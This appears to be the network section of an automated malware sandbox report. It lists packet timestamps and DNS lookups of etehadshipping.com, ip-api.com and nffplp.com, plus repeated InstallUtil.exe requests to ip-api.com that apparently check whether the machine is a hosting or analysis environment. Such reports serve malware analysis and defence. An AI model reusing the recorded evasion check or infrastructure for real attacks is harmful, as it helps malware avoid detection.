                                      Aug 20, 2024 18:40:08.589576006 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589647055 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589690924 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589864969 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589905977 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589926004 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592490911 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592546940 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.592554092 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592581987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592592001 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.592597008 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592606068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592648029 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596385002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596447945 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596491098 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596497059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596584082 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596607924 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596626043 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596796989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596842051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.825678110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.825782061 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.825809002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.825881004 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.825889111 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827171087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827193975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827214956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827234983 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.827241898 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827258110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827269077 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.827269077 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.827291012 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.832307100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832372904 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832417965 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832428932 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.832454920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832494020 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.836766005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836817980 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836829901 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836863995 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.836889029 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836929083 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.836961031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838669062 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838721037 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.838737965 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838814020 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838833094 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838851929 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.838866949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.839925051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.844320059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844361067 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844434023 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.844459057 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844485998 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844517946 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844527006 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.845076084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845144033 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845160007 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845165014 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.845175982 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845212936 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.847673893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847712040 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847786903 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.847795010 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847819090 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847858906 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.847866058 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850809097 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850825071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850841999 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850871086 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.850907087 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.853784084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.853796959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.853847980 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.853871107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.853907108 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.854307890 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.854429960 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.854465961 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.854475975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.857969046 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.857995987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.858026981 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.858052015 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.858290911 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862466097 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862479925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862528086 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.862555027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862597942 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.863915920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864780903 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864810944 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864857912 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.864870071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864897966 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866312027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866331100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866365910 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866385937 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866400957 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866426945 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866837025 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866858959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866898060 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866909027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871490002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871507883 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871519089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871562004 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.871587038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871598005 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.874907017 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.874944925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.874984980 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875004053 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875014067 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875072956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875083923 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875113964 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875119925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875159979 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875425100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875447989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875494003 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875500917 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875535965 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875590086 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.876260042 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.876313925 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.876319885 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879017115 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879085064 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.879096031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879132986 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.879160881 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879188061 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879234076 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.879239082 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879273891 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883544922 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883737087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883752108 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883790970 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883801937 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883837938 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883896112 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883913040 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883958101 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883964062 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913383007 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913403034 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913547993 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.913584948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913604021 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913707972 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.913718939 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913815975 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.913824081 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.916846037 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.916866064 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.916981936 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.917011023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.917076111 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.921195984 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921267033 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.921293974 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921324968 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921341896 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921365976 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921374083 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.921381950 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921401978 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.927298069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.927324057 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.927336931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.927383900 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.927424908 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.927953005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933136940 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933159113 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933186054 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933224916 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.933267117 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933283091 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.933773041 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933793068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933819056 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933826923 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.933856010 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.934612989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.934690952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.935477972 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936625957 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936645031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936655998 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936691999 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.936721087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936733007 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.942260981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942344904 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.942378044 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942395926 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942415953 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942445993 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.942452908 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942471027 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.947870016 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.947902918 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.947952986 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.947976112 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.948362112 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.948415995 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.948427916 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952768087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952791929 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952826977 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952838898 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.952857971 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.952877045 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.953080893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958323956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958337069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958405972 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.958426952 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958470106 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958473921 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.958508968 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958539963 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.958548069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.961905003 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.961919069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.961992025 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962011099 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962050915 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962058067 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962075949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962088108 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962124109 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962131023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962162971 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962390900 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962570906 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962589979 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962609053 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962615967 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962627888 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962641001 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962668896 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.963388920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.963404894 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.963422060 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.963469982 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.963485956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966252089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966267109 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966296911 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966326952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.966346979 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966386080 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.966393948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966440916 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.970568895 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970735073 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970822096 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.970844030 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970911980 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970947027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970966101 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.970973969 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970988989 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.999842882 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.999865055 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.999977112 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.000006914 CEST443624015.144.130.41192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 20, 2024 18:39:14.242361069 CEST | 62078 | 53 | 192.168.2.8 | 1.1.1.1
Aug 20, 2024 18:39:14.539539099 CEST | 53 | 62078 | 1.1.1.1 | 192.168.2.8
Aug 20, 2024 18:39:36.086164951 CEST | 53 | 50263 | 1.1.1.1 | 192.168.2.8
Aug 20, 2024 18:39:38.791944981 CEST | 64047 | 53 | 192.168.2.8 | 1.1.1.1
Aug 20, 2024 18:39:38.799237013 CEST | 53 | 64047 | 1.1.1.1 | 192.168.2.8
Aug 20, 2024 18:39:40.191036940 CEST | 52307 | 53 | 192.168.2.8 | 1.1.1.1
Aug 20, 2024 18:39:40.569303036 CEST | 53 | 52307 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 20, 2024 18:39:14.242361069 CEST | 192.168.2.8 | 1.1.1.1 | 0x11bf | Standard query (0) | etehadshipping.com | A (IP address) | IN (0x0001) | false
Aug 20, 2024 18:39:38.791944981 CEST | 192.168.2.8 | 1.1.1.1 | 0xb58 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Aug 20, 2024 18:39:40.191036940 CEST | 192.168.2.8 | 1.1.1.1 | 0x886a | Standard query (0) | nffplp.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 20, 2024 18:39:14.539539099 CEST | 1.1.1.1 | 192.168.2.8 | 0x11bf | No error (0) | etehadshipping.com | | 5.144.130.41 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 18:39:38.799237013 CEST | 1.1.1.1 | 192.168.2.8 | 0xb58 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 18:39:40.569303036 CEST | 1.1.1.1 | 192.168.2.8 | 0x886a | No error (0) | nffplp.com | | 163.44.198.71 | A (IP address) | IN (0x0001) | false
                                      • etehadshipping.com
                                      • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 62396 | 208.95.112.1 | 80 | 2332 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Aug 20, 2024 18:39:38.813262939 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Aug 20, 2024 18:39:39.423441887 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Tue, 20 Aug 2024 16:39:38 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 14
X-Rl: 41
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 62402 | 208.95.112.1 | 80 | 2740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Aug 20, 2024 18:40:12.460129023 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Aug 20, 2024 18:40:12.942394018 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Tue, 20 Aug 2024 16:40:12 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.8 | 62405 | 208.95.112.1 | 80 | 2852 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 20, 2024 18:40:21.373596907 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Aug 20, 2024 18:40:21.991127014 CEST | 175 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 20 Aug 2024 16:40:21 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 50
                                      X-Rl: 43
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                      Aug 20, 2024 18:40:07.115243912 CEST | 5.144.130.41 | 443 | 192.168.2.8 | 62401 | CN=*.etehadshipping.com | CN=R11, O=Let's Encrypt, C=US | Thu Jun 20 14:02:00 CEST 2024 | Wed Sep 18 14:01:59 CEST 2024 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
                                       |  |  |  |  | CN=R11, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Wed Mar 13 01:00:00 CET 2024 | Sat Mar 13 00:59:59 CET 2027 |  | 
